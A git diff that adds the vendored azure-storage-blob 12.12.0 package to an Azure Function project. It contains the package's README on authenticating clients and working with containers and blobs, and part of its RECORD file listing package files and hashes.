+   functions to create a SAS token for the storage account, container, or blob:
+
+   ```python
+   from datetime import datetime, timedelta
+   from azure.storage.blob import BlobServiceClient, generate_account_sas, ResourceTypes, AccountSasPermissions
+
+   sas_token = generate_account_sas(
+       account_name="<account_name>",
+       account_key="<account_key>",
+       resource_types=ResourceTypes(service=True),
+       permission=AccountSasPermissions(read=True),
+       expiry=datetime.utcnow() + timedelta(hours=1)
+   )
+
+   blob_service_client = BlobServiceClient(account_url="https://<my_account_name>.blob.core.windows.net", credential=sas_token)
+   ```
+
+3. To use a storage account [shared key](https://docs.microsoft.com/rest/api/storageservices/authenticate-with-shared-key/)
+   (aka account key or access key), provide the key as a string. This can be found in the Azure Portal under the "Access Keys"
+   section or by running the following Azure CLI command:
+
+   ```az storage account keys list -g MyResourceGroup -n MyStorageAccount```
+
+   Use the key as the credential parameter to authenticate the client:
+   ```python
+   from azure.storage.blob import BlobServiceClient
+   service = BlobServiceClient(account_url="https://<my_account_name>.blob.core.windows.net", credential="<account_key>")
+   ```
+
+   If you are using a **customized URL** (meaning the URL is not in the format `<my_account_name>.blob.core.windows.net`),
+   instantiate the client using the credential below:
+   ```python
+   from azure.storage.blob import BlobServiceClient
+   service = BlobServiceClient(account_url="https://<my_account_name>.blob.core.windows.net",
+                               credential={"account_name": "<account_name>", "account_key": "<account_key>"})
+   ```
+
+4. To use [anonymous public read access](https://docs.microsoft.com/azure/storage/blobs/storage-manage-access-to-resources),
+   simply omit the credential parameter (a short example appears in the combined sketch at the end of this README).
+
+#### Creating the client from a connection string
+Depending on your use case and authorization method, you may prefer to initialize a client instance with a storage
+connection string instead of providing the account URL and credential separately.
To do this, pass the storage +connection string to the client's `from_connection_string` class method: + +```python +from azure.storage.blob import BlobServiceClient + +connection_string = "DefaultEndpointsProtocol=https;AccountName=xxxx;AccountKey=xxxx;EndpointSuffix=core.windows.net" +service = BlobServiceClient.from_connection_string(conn_str=connection_string) +``` + +The connection string to your storage account can be found in the Azure Portal under the "Access Keys" section or by running the following CLI command: + +```bash +az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount +``` + +## Key concepts +The following components make up the Azure Blob Service: +* The storage account itself +* A container within the storage account +* A blob within a container + +The Azure Storage Blobs client library for Python allows you to interact with each of these components through the +use of a dedicated client object. + +### Clients +Four different clients are provided to interact with the various components of the Blob Service: +1. [BlobServiceClient](https://aka.ms/azsdk-python-storage-blob-blobserviceclient) - + this client represents interaction with the Azure storage account itself, and allows you to acquire preconfigured + client instances to access the containers and blobs within. It provides operations to retrieve and configure the + account properties as well as list, create, and delete containers within the account. To perform operations on a + specific container or blob, retrieve a client using the `get_container_client` or `get_blob_client` methods. +2. [ContainerClient](https://aka.ms/azsdk-python-storage-blob-containerclient) - + this client represents interaction with a specific container (which need not exist yet), and allows you to acquire + preconfigured client instances to access the blobs within. It provides operations to create, delete, or configure a + container and includes operations to list, upload, and delete the blobs within it. To perform operations on a + specific blob within the container, retrieve a client using the `get_blob_client` method. +3. [BlobClient](https://aka.ms/azsdk-python-storage-blob-blobclient) - + this client represents interaction with a specific blob (which need not exist yet). It provides operations to + upload, download, delete, and create snapshots of a blob, as well as specific operations per blob type. +4. [BlobLeaseClient](https://aka.ms/azsdk-python-storage-blob-blobleaseclient) - + this client represents lease interactions with a `ContainerClient` or `BlobClient`. It provides operations to + acquire, renew, release, change, and break a lease on a specified resource. + +### Async Clients +This library includes a complete async API supported on Python 3.5+. To use it, you must +first install an async transport, such as [aiohttp](https://pypi.org/project/aiohttp/). +See +[azure-core documentation](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/CLIENT_LIBRARY_DEVELOPER.md#transport) +for more information. + +Async clients and credentials should be closed when they're no longer needed. These +objects are async context managers and define async `close` methods. + +### Blob Types +Once you've initialized a Client, you can choose from the different types of blobs: +* [Block blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-block-blobs) + store text and binary data, up to approximately 4.75 TiB. 
Block blobs are made up of blocks of data that can be
+  managed individually
+* [Append blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-append-blobs)
+  are made up of blocks like block blobs, but are optimized for append operations. Append blobs are ideal for scenarios
+  such as logging data from virtual machines
+* [Page blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-page-blobs)
+  store random access files up to 8 TiB in size. Page blobs store virtual hard drive (VHD) files and serve as disks for
+  Azure virtual machines
+
+## Examples
+The following sections provide several code snippets covering some of the most common Storage Blob tasks, including:
+
+* [Create a container](#create-a-container "Create a container")
+* [Uploading a blob](#uploading-a-blob "Uploading a blob")
+* [Downloading a blob](#downloading-a-blob "Downloading a blob")
+* [Enumerating blobs](#enumerating-blobs "Enumerating blobs")
+
+Note that a container must be created before you can upload or download a blob.
+
+### Create a container
+
+Create a container from which you can upload or download blobs.
+```python
+from azure.storage.blob import ContainerClient
+
+container_client = ContainerClient.from_connection_string(conn_str="<connection_string>", container_name="my_container")
+
+container_client.create_container()
+```
+
+Use the async client to create a container
+
+```python
+from azure.storage.blob.aio import ContainerClient
+
+container_client = ContainerClient.from_connection_string(conn_str="<connection_string>", container_name="my_container")
+
+await container_client.create_container()
+```
+
+### Uploading a blob
+Upload a blob to your container
+
+```python
+from azure.storage.blob import BlobClient
+
+blob = BlobClient.from_connection_string(conn_str="<connection_string>", container_name="my_container", blob_name="my_blob")
+
+with open("./SampleSource.txt", "rb") as data:
+    blob.upload_blob(data)
+```
+
+Use the async client to upload a blob
+
+```python
+from azure.storage.blob.aio import BlobClient
+
+blob = BlobClient.from_connection_string(conn_str="<connection_string>", container_name="my_container", blob_name="my_blob")
+
+with open("./SampleSource.txt", "rb") as data:
+    await blob.upload_blob(data)
+```
+
+### Downloading a blob
+Download a blob from your container
+
+```python
+from azure.storage.blob import BlobClient
+
+blob = BlobClient.from_connection_string(conn_str="my_connection_string", container_name="my_container", blob_name="my_blob")
+
+with open("./BlockDestination.txt", "wb") as my_blob:
+    blob_data = blob.download_blob()
+    blob_data.readinto(my_blob)
+```
+
+Download a blob asynchronously
+
+```python
+from azure.storage.blob.aio import BlobClient
+
+blob = BlobClient.from_connection_string(conn_str="my_connection_string", container_name="my_container", blob_name="my_blob")
+
+with open("./BlockDestination.txt", "wb") as my_blob:
+    stream = await blob.download_blob()
+    data = await stream.readall()
+    my_blob.write(data)
+```
+
+### Enumerating blobs
+List the blobs in your container
+
+```python
+from azure.storage.blob import ContainerClient
+
+container = ContainerClient.from_connection_string(conn_str="my_connection_string", container_name="my_container")
+
+blob_list = container.list_blobs()
+for blob in blob_list:
+    print(blob.name + '\n')
+```
+
+List the blobs asynchronously
+
+```python
+from azure.storage.blob.aio import ContainerClient
+
+container = ContainerClient.from_connection_string(conn_str="my_connection_string", container_name="my_container")
+
+blob_list = []
+async for blob in container.list_blobs():
+    blob_list.append(blob)
+print(blob_list)
+```
+
+## Optional Configuration
+
+Optional keyword arguments can be passed in at the client and per-operation level; a combined sketch appears at the end of this README.
+
+### Retry Policy configuration
+
+Use the following keyword arguments when instantiating a client to configure the retry policy:
+
+* __retry_total__ (int): Total number of retries to allow. Takes precedence over other counts.
+Pass in `retry_total=0` if you do not want to retry on requests. Defaults to 10.
+* __retry_connect__ (int): How many connection-related errors to retry on. Defaults to 3.
+* __retry_read__ (int): How many times to retry on read errors. Defaults to 3.
+* __retry_status__ (int): How many times to retry on bad status codes. Defaults to 3.
+* __retry_to_secondary__ (bool): Whether the request should be retried to secondary, if able.
+This should only be enabled if RA-GRS accounts are used and potentially stale data can be handled.
+Defaults to `False`.
+
+### Encryption configuration
+
+Use the following keyword arguments when instantiating a client to configure encryption:
+
+* __require_encryption__ (bool): If set to True, enforces that objects are encrypted and decrypts them.
+* __key_encryption_key__ (object): The user-provided key-encryption-key. The instance must implement the following methods:
+    - `wrap_key(key)`--wraps the specified key using an algorithm of the user's choice.
+    - `get_key_wrap_algorithm()`--returns the algorithm used to wrap the specified symmetric key.
+    - `get_kid()`--returns a string key id for this key-encryption-key.
+* __key_resolver_function__ (callable): The user-provided key resolver. Uses the kid string to return a key-encryption-key
+implementing the interface defined above.
+
+### Other client / per-operation configuration
+
+Other optional configuration keyword arguments can be specified on the client or per-operation.
+
+**Client keyword arguments:**
+
+* __connection_timeout__ (int): The number of seconds the client will wait to establish a connection to the server.
+* __read_timeout__ (int): The number of seconds the client will wait, after the connection has been established, for the server to send a response.
+* __transport__ (Any): User-provided transport to send the HTTP request.
+
+**Per-operation keyword arguments:**
+
+* __raw_response_hook__ (callable): The given callback uses the response returned from the service.
+* __raw_request_hook__ (callable): The given callback uses the request before it is sent to the service.
+* __client_request_id__ (str): Optional user-specified identification of the request.
+* __user_agent__ (str): Appends the custom value to the user-agent header to be sent with the request.
+* __logging_enable__ (bool): Enables logging at the DEBUG level. Defaults to False. Can also be passed in at
+the client level to enable it for all requests.
+* __logging_body__ (bool): Enables logging the request and response body. Defaults to False. Can also be passed in at
+the client level to enable it for all requests.
+* __headers__ (dict): Pass in custom headers as key, value pairs. E.g. `headers={'CustomValue': value}`
+
+## Troubleshooting
+### General
+Storage Blob clients raise exceptions defined in [Azure Core](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/README.md).
+
+This list can be used for reference to catch thrown exceptions.
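+For example, here is a minimal sketch (the connection string and container name are hypothetical)
+that catches a lookup against a container that does not exist:
+
+```python
+from azure.core.exceptions import ResourceNotFoundError
+from azure.storage.blob import ContainerClient
+
+# Hypothetical values -- substitute your own connection string and container name
+container_client = ContainerClient.from_connection_string(
+    conn_str="my_connection_string", container_name="missing-container")
+
+try:
+    container_client.get_container_properties()
+except ResourceNotFoundError as error:
+    print("Container does not exist:", error)
+```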
To get the specific error code of the exception, use the `error_code` attribute, i.e., `exception.error_code`.
+
+### Logging
+This library uses the standard
+[logging](https://docs.python.org/3/library/logging.html) library for logging.
+Basic information about HTTP sessions (URLs, headers, etc.) is logged at INFO
+level.
+
+Detailed DEBUG level logging, including request/response bodies and unredacted
+headers, can be enabled on a client with the `logging_enable` argument:
+```python
+import sys
+import logging
+from azure.storage.blob import BlobServiceClient
+
+# Create a logger for the 'azure.storage.blob' SDK
+logger = logging.getLogger('azure.storage.blob')
+logger.setLevel(logging.DEBUG)
+
+# Configure a console output
+handler = logging.StreamHandler(stream=sys.stdout)
+logger.addHandler(handler)
+
+# This client will log detailed information about its HTTP sessions, at DEBUG level
+service_client = BlobServiceClient.from_connection_string("your_connection_string", logging_enable=True)
+```
+
+Similarly, `logging_enable` can enable detailed logging for a single operation,
+even when it isn't enabled for the client:
+```python
+service_client.get_service_stats(logging_enable=True)
+```
+
+## Next steps
+
+### More sample code
+
+Get started with our [Blob samples](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples).
+
+Several Storage Blobs Python SDK samples are available to you in the SDK's GitHub repository. These samples provide example code for additional scenarios commonly encountered while working with Storage Blobs:
+
+* [blob_samples_container_access_policy.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_container_access_policy.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_container_access_policy_async.py)) - Examples to set Access policies:
+    * Set up Access Policy for container
+
+* [blob_samples_hello_world.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_hello_world.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_hello_world_async.py)) - Examples for common Storage Blob tasks:
+    * Set up a container
+    * Create a block, page, or append blob
+    * Upload blobs
+    * Download blobs
+    * Delete blobs
+
+* [blob_samples_authentication.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_authentication.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_authentication_async.py)) - Examples for authenticating and creating the client:
+    * From a connection string
+    * From a shared access key
+    * From a shared access signature token
+    * From active directory
+
+* [blob_samples_service.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_service.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_service_async.py)) - Examples for interacting with the blob service:
+    * Get account information
+    * Get and set service properties
+    * Get service statistics
+    * Create, list, and delete containers
+    * Get the Blob or Container client
+
*
[blob_samples_containers.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_containers.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_containers_async.py)) - Examples for interacting with containers: + * Create a container and delete containers + * Set metadata on containers + * Get container properties + * Acquire a lease on container + * Set an access policy on a container + * Upload, list, delete blobs in container + * Get the blob client to interact with a specific blob + +* [blob_samples_common.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_common.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_common_async.py)) - Examples common to all types of blobs: + * Create a snapshot + * Delete a blob snapshot + * Soft delete a blob + * Undelete a blob + * Acquire a lease on a blob + * Copy a blob from a URL + +* [blob_samples_directory_interface.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_directory_interface.py) - Examples for interfacing with Blob storage as if it were a directory on a filesystem: + * Copy (upload or download) a single file or directory + * List files or directories at a single level or recursively + * Delete a single file or recursively delete a directory + +### Additional documentation +For more extensive documentation on Azure Blob storage, see the [Azure Blob storage documentation](https://docs.microsoft.com/azure/storage/blobs/) on docs.microsoft.com. + +## Contributing +This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com. + +When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA. + +This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. 
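+
+As referenced in the sections above, the following is a minimal combined sketch of the optional
+configuration and anonymous access described earlier. The connection string, account name, and
+values shown are hypothetical placeholders rather than recommended defaults:
+
+```python
+from azure.storage.blob import BlobServiceClient
+
+# Client-level configuration: retry policy and timeouts (see "Optional Configuration")
+service = BlobServiceClient.from_connection_string(
+    "DefaultEndpointsProtocol=https;AccountName=xxxx;AccountKey=xxxx;EndpointSuffix=core.windows.net",
+    retry_total=5,          # total number of retries to allow
+    retry_connect=2,        # connection-related errors to retry on
+    connection_timeout=20,  # seconds to wait to establish a connection
+    read_timeout=60,        # seconds to wait for the server's response
+)
+
+# Per-operation configuration, e.g. DEBUG logging for this one call only
+for container in service.list_containers(logging_enable=True):
+    print(container.name)
+
+# Anonymous public read access (credential type 4 above): omit the credential entirely
+public_service = BlobServiceClient(account_url="https://<my_account_name>.blob.core.windows.net")
+```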
+ + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD new file mode 100644 index 0000000..7aaa7ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD @@ -0,0 +1,150 @@ +azure/storage/blob/__init__.py,sha256=bPV07iW0lXdYMBC0y67BwrIXyzB9_Mdj3sNGNj9qJkY,9297 +azure/storage/blob/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_container_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc,, +azure/storage/blob/__pycache__/_download.cpython-39.pyc,, +azure/storage/blob/__pycache__/_lease.cpython-39.pyc,, +azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc,, +azure/storage/blob/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc,, +azure/storage/blob/__pycache__/_serialize.cpython-39.pyc,, +azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc,, +azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc,, +azure/storage/blob/__pycache__/_version.cpython-39.pyc,, +azure/storage/blob/_blob_client.py,sha256=oS_f_-vQTEqP36-QULYgY6nG9JR1Nb1RlWTYM9FqVmc,215964 +azure/storage/blob/_blob_service_client.py,sha256=UOo4L_jUr5KoivqwFu_TnHk7UZCZNsZwKXD8B6_vhhY,34604 +azure/storage/blob/_container_client.py,sha256=M61zCsPCsPzhmNuEKc9ap1o3KsVnpW9X_bc2rpKtKPE,81125 +azure/storage/blob/_deserialize.py,sha256=Mq-DQCoj6z1A7nqFH4cVt3IpU3YngOm8v1kpxJFf8Rw,8060 +azure/storage/blob/_download.py,sha256=dDIupMbxZwpnPiFb0oYniCMH7DEvWhdmeicl4cYCo1w,25503 +azure/storage/blob/_generated/__init__.py,sha256=VWdzOuqJvcA-A6D2CNPkf4EcvmMWjL9EiQBGXjuAtcA,779 +azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc,, +azure/storage/blob/_generated/_azure_blob_storage.py,sha256=bGYdDxc4nwfknLt7Mz1764CBSISWDYyzFJqG6aMDYVE,4907 +azure/storage/blob/_generated/_configuration.py,sha256=PDjVM2__i_Laq_V_ZbEwCytfzl16sdv81SxWu0zNvPo,2821 +azure/storage/blob/_generated/_patch.py,sha256=O3WqSw6Y7KNXtwLAglfxuizkuFeyzm2-WJYksgull1U,1529 +azure/storage/blob/_generated/_vendor.py,sha256=F5rnE0tJotT9NJvZIGN1zlAFXANoIfWvHFLhsSUM-fM,1197 +azure/storage/blob/_generated/aio/__init__.py,sha256=VWdzOuqJvcA-A6D2CNPkf4EcvmMWjL9EiQBGXjuAtcA,779 +azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc,, +azure/storage/blob/_generated/aio/_azure_blob_storage.py,sha256=HCWv3o5Ztc3LTJ_nssDTO-1onMm1QgPsiXQY6Is0WSI,4767 +azure/storage/blob/_generated/aio/_configuration.py,sha256=Y6nC4y1bSPtlItBD92tKnN1_zG0FLtb_5qb1Bpn9IFE,2653 +azure/storage/blob/_generated/aio/_patch.py,sha256=O3WqSw6Y7KNXtwLAglfxuizkuFeyzm2-WJYksgull1U,1529 
+azure/storage/blob/_generated/aio/operations/__init__.py,sha256=lMczAvvIgMN4G93Gh8gKPFvRzLmBovBu6TRFC2A2Yf8,957 +azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/_append_blob_operations.py,sha256=DcfKmuQCbsmThijjvg1ieQOV17ODmyAeVFso9yXmWWI,36933 +azure/storage/blob/_generated/aio/operations/_blob_operations.py,sha256=qjWP-euzY9tVKsYANb61k45Asw_mBY4FDsTYNwiZSCQ,163444 +azure/storage/blob/_generated/aio/operations/_block_blob_operations.py,sha256=_aw4koSWODxzfkwHS-W9Ocx3TWjIhMoL55siuccIlPM,59370 +azure/storage/blob/_generated/aio/operations/_container_operations.py,sha256=fRP7LACujZ2wtOaKTx4oLHATs4MmuVh5dUPs4rzbYqQ,92506 +azure/storage/blob/_generated/aio/operations/_page_blob_operations.py,sha256=zjmsPx8moy0-NKFggQaWwamZP4hWDQPg9nmn9K3WSaU,76370 +azure/storage/blob/_generated/aio/operations/_service_operations.py,sha256=Q4ethNAxa-gMOQEMWoP3ciyFhIuy7nopBusuYy0vDzI,35307 +azure/storage/blob/_generated/models/__init__.py,sha256=-WrZs3lZLO5nfKgh55BKRlB-Mvcmoh5FvTKowI7NxM4,8345 +azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc,, +azure/storage/blob/_generated/models/_azure_blob_storage_enums.py,sha256=2pMN19XgZuuULeu0EBBvAklS9EbYTtGjtawU6ysQeqo,12288 +azure/storage/blob/_generated/models/_models.py,sha256=mSJM68n6LDY31MQq2y8K1WwRJUZnyjPm4gdiqwCNfMM,103782 +azure/storage/blob/_generated/models/_models_py3.py,sha256=-6LyO-ApKEjHQDTvh28cgNexSdJXD1rq2DW6IeVOpoc,110664 +azure/storage/blob/_generated/operations/__init__.py,sha256=lMczAvvIgMN4G93Gh8gKPFvRzLmBovBu6TRFC2A2Yf8,957 +azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/_append_blob_operations.py,sha256=rOnS58Lt9SYoO5egHYsWYD23nEG3sR9VtL2o0j9iZXk,59637 +azure/storage/blob/_generated/operations/_blob_operations.py,sha256=MjNgcxZVL4TNyrQhcv0DX2ry32bbvfOnVmHoVTbpbHE,242157 +azure/storage/blob/_generated/operations/_block_blob_operations.py,sha256=NSxvPe6E9IYwXmCQji1zeU2Sx4JfWh4FrO1pseA-MMQ,96200 +azure/storage/blob/_generated/operations/_container_operations.py,sha256=5uOE9Qy9u3aP3kPb1vFu6Soy0Uugqhsu7tU8y82gufo,134896 
+azure/storage/blob/_generated/operations/_page_blob_operations.py,sha256=U8-VZzF-BRPBbT2ev4KSm0BboJxGcxEFTfQOWLcz6js,121685 +azure/storage/blob/_generated/operations/_service_operations.py,sha256=YP-bACw9ksXNsZtjFgNc2kanE0Qvo6CleE73yXiGLpY,50251 +azure/storage/blob/_lease.py,sha256=wVtbtCrSetuVHszyRp22gFoKU8NM7HwxBkCBJe2rBu4,16639 +azure/storage/blob/_list_blobs_helper.py,sha256=400ImGGOqG95DuVzwO39Xw0t-gEkrexj2P--pSfSwU4,11076 +azure/storage/blob/_models.py,sha256=FlEX5FKlQOEI1hllUk3R28Fel4NYuMVHWvMULVicWnw,57292 +azure/storage/blob/_quick_query_helper.py,sha256=_KzHY8Q8X8qSkksP_IMO_u2m2OKMkRcePhurZlKFtmo,6270 +azure/storage/blob/_serialize.py,sha256=meZPhxav0c0_Hv-4SAzSm8WGVvJY7Fcbj5vsngQY_X8,7864 +azure/storage/blob/_shared/__init__.py,sha256=-uU6OPLpjp10tnpV0K9D2YliO26Nswlralgt5oeYEyU,1529 +azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc,, +azure/storage/blob/_shared/authentication.py,sha256=PLgxffD8xSzi0z4y2WeomaLVMMG9HwwqxVjWzwev_AM,6701 +azure/storage/blob/_shared/avro/__init__.py,sha256=Ch-mWS2_vgonM9LjVaETdaW51OL6LfG23X-0tH2AFjw,310 +azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc,, +azure/storage/blob/_shared/avro/avro_io.py,sha256=_j-9w8LrzwfuWWxODqBclOjBvQkGqOyQAVDXlEVvbOo,16446 +azure/storage/blob/_shared/avro/avro_io_async.py,sha256=SaESNFsrp8EjwQxTtoRoQ22UmSCd4ENBDHFgONovsYI,16593 +azure/storage/blob/_shared/avro/datafile.py,sha256=ALR5EBiBFn2JrVgMrp9EoMyvyqGi-4A4fUqYv8m7pnQ,8563 +azure/storage/blob/_shared/avro/datafile_async.py,sha256=aymkqV-R034RVW1dE2Y8Ga0RD8dkTa8bYkBH4N5S-V4,7334 +azure/storage/blob/_shared/avro/schema.py,sha256=ZVYobUzIjFwWA_ubPp0nj0pxXYSbtijFhgZlQ-v4y6w,36373 +azure/storage/blob/_shared/base_client.py,sha256=9leyqfVgzGjKqb5mrv1WkaqFhskPmzi-hKjGS3r3FSc,17790 +azure/storage/blob/_shared/base_client_async.py,sha256=3yEQZ3zyDTEDwSSRGLxaBwcZOYLj6wbDj1g0YwcyU6U,7050 +azure/storage/blob/_shared/constants.py,sha256=1uo6pz8tD050yoVw5mEwH2DoOmJhTVWhizz3e-g9Mxk,704 +azure/storage/blob/_shared/encryption.py,sha256=L181TZUELDH40mW-J3tOH-NJNkYk_aFfu3h3zYLkf0E,22608 +azure/storage/blob/_shared/models.py,sha256=SQWC08D5Z7Ya26aQQurgSR53nxOTZ2TGv3ho_SRWTuQ,20674 
+azure/storage/blob/_shared/parser.py,sha256=eOg-G0FOrddsj2fw5OLkMghdc5Uffp-qOtrSWYJB7A4,617 +azure/storage/blob/_shared/policies.py,sha256=IhvgCo3t_-fPRJ0GM8KGZOWAosLStmhDhlC2AffgJT4,28970 +azure/storage/blob/_shared/policies_async.py,sha256=EyoiZh6KkkRrqwYKAD0pFpD68aUERAVTYP_7Et0Etkk,11530 +azure/storage/blob/_shared/request_handlers.py,sha256=4UqOnr1SWJXzCsfoAqHAH8yMaLMXVn3Yq4-IW5zfvdY,10014 +azure/storage/blob/_shared/response_handlers.py,sha256=qqzP2MEPOnv_lUK07_SjaKhoVfiss4Yb5kOcTk55p88,8640 +azure/storage/blob/_shared/shared_access_signature.py,sha256=fLNnJhNnSI_g4nCcapdSSgWX5OfgI_0rxWgNMUZF2ys,10330 +azure/storage/blob/_shared/uploads.py,sha256=nDfR_EUQcEsbzd8LvaPEztupgfxGBMXjTmbgsD8X2mU,22746 +azure/storage/blob/_shared/uploads_async.py,sha256=mEQx_nq7WeB0XhG2u6dSlc3S_vaDO-1fqjxLkbt3kEk,15229 +azure/storage/blob/_shared_access_signature.py,sha256=nUDKhhgUOiInYUb0FjwzKZvwtKrkFqGiF9yrx-qCGaU,31629 +azure/storage/blob/_upload_helpers.py,sha256=DEzS6BbPr-mvrvPL9_qcfgCSK8Cc3cx2w6WUZZQuGpY,12810 +azure/storage/blob/_version.py,sha256=0kVintILK5ee_IztQ_9QzLOgxtLEvIg3sKyVH3t5RwY,331 +azure/storage/blob/aio/__init__.py,sha256=yKda-lZsPg5RpPtYKTtpCnp2SARN1z1w7GadwZzX7Hk,7001 +azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc,, 